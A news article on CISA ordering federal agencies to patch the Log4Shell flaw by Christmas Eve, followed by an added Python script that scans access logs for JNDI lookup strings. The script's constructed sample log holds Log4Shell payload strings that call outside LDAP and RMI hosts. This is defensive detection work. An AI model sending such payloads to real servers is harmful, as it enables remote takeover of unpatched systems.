CISA tells federal agencies to patch Log4Shell before Christmas
The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve.
According to this catalog, federal agencies have ten days to determine which of their internal apps and servers use the Log4j Java library, check whether those systems are vulnerable to the Log4Shell exploit, and patch the affected servers.
All of this must be done by December 24, according to a timeline provided in the catalog.
In addition, CISA yesterday launched a dedicated web page providing guidance to the US public and private sectors on the Log4Shell vulnerability.
CISA plans to list on this page all software vendors whose products are vulnerable to Log4Shell, giving companies a central place to find Log4Shell patching information. Patches for the Log4j library itself have been available since last week, but software vendors must still incorporate those patches into their own products.
At the time of writing, the page is still empty; CISA staff are gathering the information via a GitHub project.
Luckily, security researcher Royce Williams has already compiled a list of what is and is not vulnerable to Log4Shell, available here and covering more than 300 vendors. Another such list is maintained by the Dutch National Cyber Security Center.
The Log4Shell vulnerability was disclosed last Thursday. It is a bug in Log4j, a Java library that provides log creation and management capabilities for many Java desktop apps and server software.
Despite being only days old, it is already considered one of the worst security flaws ever discovered, primarily because of the near-ubiquitous use of Log4j among enterprise software makers, the simplicity of the exploit, and the ability it gives attackers to hijack systems remotely.
Within days of disclosure, the vulnerability has been exploited at scale, has been incorporated into the arsenals of at least ten different malware botnets and operations, and is primed for abuse by cyber-espionage and ransomware groups.
Another aspect to consider is that both Cisco and Cloudflare said they first saw signs of Log4Shell exploitation two weeks before the flaw was made public. Security teams therefore need to broaden their incident response investigations and check for signs of possible exploitation against their networks going back to the start of the month, not just last week. More precisely, the first attacks were observed on December 1 of this year.
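To make that broader investigation window concrete, the following added example (not code from CISA or from the article) scans text logs for the Log4j JNDI lookup string that Log4Shell exploitation attempts carry, restricted to entries on or after December 1, and reports whether the log retention even reaches back that far. The sample access-log lines, the combined-log-format timestamps and the TEST-NET addresses are all constructed for the example.

```python
import re
from datetime import date, datetime

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Nov/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.5/a}"
198.51.100.3 - - [05/Dec/2021:09:41:55 +0000] "GET /login HTTP/1.1" 200 2048 "-" "curl/7.68.0"
192.0.2.10 - - [12/Dec/2021:03:17:40 +0000] "GET /?x=${JNDI:rmi://192.0.2.99/x} HTTP/1.1" 404 0 "-" "-"
"""

# Start of the investigation window the article argues for: first observed attacks, 1 December 2021.
WINDOW_START = date(2021, 12, 1)

# Indicator: a Log4j lookup expression invoking JNDI. Case-insensitive, since the casing varies in the wild.
# Heavily obfuscated variants exist that this simple pattern will not catch; treat a clean result as
# "no obvious attempts", not as proof of absence.
JNDI_PATTERN = re.compile(r"\$\{[^}]*jndi:", re.IGNORECASE)
TIMESTAMP_PATTERN = re.compile(r"\[(\d{2}/\w{3}/\d{4})")


def parse_log_date(line):
    """Extract the calendar date from a combined-log-format timestamp, or None if absent."""
    m = TIMESTAMP_PATTERN.search(line)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%d/%b/%Y").date()


def find_log4shell_attempts(log_text, window_start=WINDOW_START):
    """Scan log_text for JNDI lookup strings from window_start onward.

    Returns a dict with 'hits' (list of (line_no, date, line)) and 'covers_window'
    (True when the earliest dated line is on or before window_start, i.e. the log
    actually reaches back far enough to answer the question).
    """
    hits, earliest = [], None
    for n, line in enumerate(log_text.splitlines(), 1):
        d = parse_log_date(line)
        if d is None:
            continue
        earliest = d if earliest is None or d < earliest else earliest
        if d >= window_start and JNDI_PATTERN.search(line):
            hits.append((n, d, line))
    return {"hits": hits, "covers_window": earliest is not None and earliest <= window_start}


if __name__ == "__main__":
    result = find_log4shell_attempts(SAMPLE_LOG)
    print("log covers window:", result["covers_window"])
    for n, d, line in result["hits"]:
        print(f"line {n} ({d}): {line}")
```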